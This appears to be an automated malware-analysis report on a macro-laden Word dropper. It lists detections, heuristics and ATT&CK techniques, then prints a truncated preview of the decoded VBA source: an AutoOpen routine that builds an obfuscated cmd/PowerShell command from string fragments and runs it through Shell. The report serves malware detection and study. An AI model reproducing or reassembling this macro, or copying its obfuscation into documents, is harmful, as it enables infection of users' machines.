Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is configured to execute a command using the Shell() function, which is a critical finding. The ClamAV detection name 'Doc.Dropper.Valyria-6668100-0' suggests it acts as a dropper for further malicious payloads. The obfuscated script makes it difficult to determine the exact payload, but the intent is clearly to execute arbitrary commands.
Heuristics (7)

- ClamAV: Doc.Dropper.Valyria-6668100-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Valyria-6668100-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14202 bytes |

SHA-256 of macros.bas: 9779615afe179ae64c54b75b5578480d116b6d5927941a35de6823b5a37d3160
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "DlLVColizzEq" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next Hour Sqr(hMJhB) Hour 40 Error Atn(1) Error CCur(VIPhP) Hour 1 Shell# KeyString(YQiHlQDabKGSip + rLEJMjPkO + vbKeyC + BfqwbsiPzNwaK + tJdCwXsPJ) + RksBtsjXCvkLfa + TDtltPwnFH + UBitRZz + KiiqiSjUM + PRPpATiF + wnwiWApmPz + USmDi + DBaDmYW + jmWXDlSD + bkfPGcdQdC + ZGwWjtArm + hwzNpMAwDQ + jwjYHi + lLtmw + UFtnsSIzwcuwYL + FCmEvmhZCtfDwC, 449784644 - 449784644 Hour CDate(BXjnr) Error 8 End Sub Attribute VB_Name = "iHJjMWjDQSX" Function UBitRZz() On Error Resume Next Error Str(60383 * 74581 + aFqLTl / 26537) Error 1085 sHYzaHwjTjj = "mD " + " " + " " + " " + "/" + "v" + ":oN" + " " + " " + " " Hour CStr(ozlBQr) Error TimeValue(1) jKlpHQ = " " + " " + " " + " " + " " + " " + " " + " " + "/c" Hour 9 Hour 508 bJFviRjvGM = " " + " " + " " + " " + " " + " " + " " + " " + CStr(Chr(LnGTBXAUOVvCP + LJFUYMwQb + 34 + KROPikP + jrzkPnSziDJil)) + " " + " " Hour CDbl(Chjzmf / qmsts) Error Int(587) iiziz = "s" + "E" + "t " + " } " + " " Hour Hex(PTEsFO - bwfAu) Error Round(7) odJilONhX = "=/o" + ",e" + "r-}" + "ell" + "h`e" + "hJA" + "B" + "DA" + "G0" + "AY" + "QA" Error Cos(100) Error 48 SwoVLRRkkZL = "'" + "AG4" + "AZ" + "Q" + "B" + "3" + "AC" + "0" Error FJCrf Error CDec(33) Hour TimeValue(EOCcRo + FsIki) jGpdSozEn = "Ab," + "BiA" + "G" + "oAZ" + "QBj" + "A;" + "Q" + "AI" + "A" Hour RMBjpu Error LCase(10409 - HfWZU / aYZAGv + 2002) Error 770 tCVOjs = "B\A" + "G2" + "AdA" + "A" + "uAF" + "c" + "AZQ" + "Bi" + "AE" + "M" UBitRZz = sHYzaHwjTjj + jKlpHQ + bJFviRjvGM + iiziz + odJilONhX + SwoVLRRkkZL + jGpdSozEn + tCVOjs Hour LEQca Hour CVar(62) End Function Function KiiqiSjUM() On Error Resume Next Error vOjbSk Error 8 Error 431 iGiGruBdAN = "Ab" + "A" + "B/" + "A" + "G" + 
"2Ab" + "gB0" Error LNNMW Error TEsaRO Hour CByte(96) wYPPWqSo = "AD" + "-" + "A" + "JA" + "B" + "1AF" Error 6 Hour 99 Hour Sqr(632) QLLmTkGYOJi = "AAR" + "QA" + "'" + "A" + "Cc" + "AwA" + "B0A" + ";Q" + "Ac" + "AA" + "6AC" + "8A$" Hour CDate(93077 * nXfiCf) Hour Tan(3891) WpqFKU = "," + "Bi" + "A" + ";" + "IAw" + "QBn" + "AGg" + "Ad" + "ABv" + "AG4" + "AwA" Hour tjcBh Error Int(jfjHMq) Hour 319432244 THFzc = "B" + "vA;" + "Y" + "AZQ" + "BjA" + "G" + ",AZ" + "Q" + "B}A" Error Int(5) Error 379512492 mJkqfiPJPHj = "G4" + "AZ" + "QBy" + "A;M" + "A$g" + "BjA" + "G" + "8A" + "bQ" Error Sqr(BhXQU + mLvAFH) Hour Sgn(859) Hour Val(jnBLSk) kvAzBci = "AvA" + "D" + "AA" + "ZAB" + "GA" + "GkA" + "ZQ" + "B3A" + "E" + "AA" + "wA" + "B0A" Error 256125246 Error Fix(24427 * mqvvK) iGriOndA = ";Q" + "AcA" + "A" + "6A" + "C8A" + "$," + "Bn" + "A" + "G" + "E" Error ZBzjXu Error YhzMq ikXqGavvMpo = "Aw" + "Q" + "B-A" + "G" + "8A" + "bg" + "Bn" Error Rnd(WqpEZ) Error Int(2211) KwdXXPEi = "AC" + "4" + "Ab" + "g" + "B" + "l" + "A;Q" + "A" + "$," + "B;" + "A" Hour Cos(mpsFkj + LwTcI) Hour Str(7557 + dzqBod / rEvjaK / XLlpd) rlvcijiF = ";c" + "ATQ" + "B5A" + "EA" + "AwA" + "B" Error CDec(570) Error Int(428575136) Error Log(IGbDzL) dIuBmm = "0A;" + "QA" + "cAA" + "6" + "AC8" + "A" + "$,B" + "rA" Error mrKww Error XStoZ SnGEqAcsvrv = "G" + "4A" + "b," + "B3" + "AGk" + "A" + "bg" KiiqiSjUM = iGiGruBdAN + wYPPWqSo + QLLmTkGYOJi + WpqFKU + THFzc + mJkqfiPJPHj + kvAzBci + iGriOndA + ikXqGavvMpo + KwdXXPEi + rlvcijiF + dIuBmm + SnGEqAcsvrv Hour 42 Hour Sin(57135 * FcGSwE + 52046 / lhXUom) End Function Function PRPpATiF() On Error Resume Next Hour Sqr(16449 - 1338) Error CDate(4895) zTUcVcR = "BnA" + "GE" + "AZg" + "By" + "AGk" + "AY" + ",B" + "}AC" + "4" + "Ab" Hour LCase(1) Hour Log(6) Error 198 GDfrld = "," + "B" + "y" + "AGc" + "A" + "$" + ",B ... (truncated) |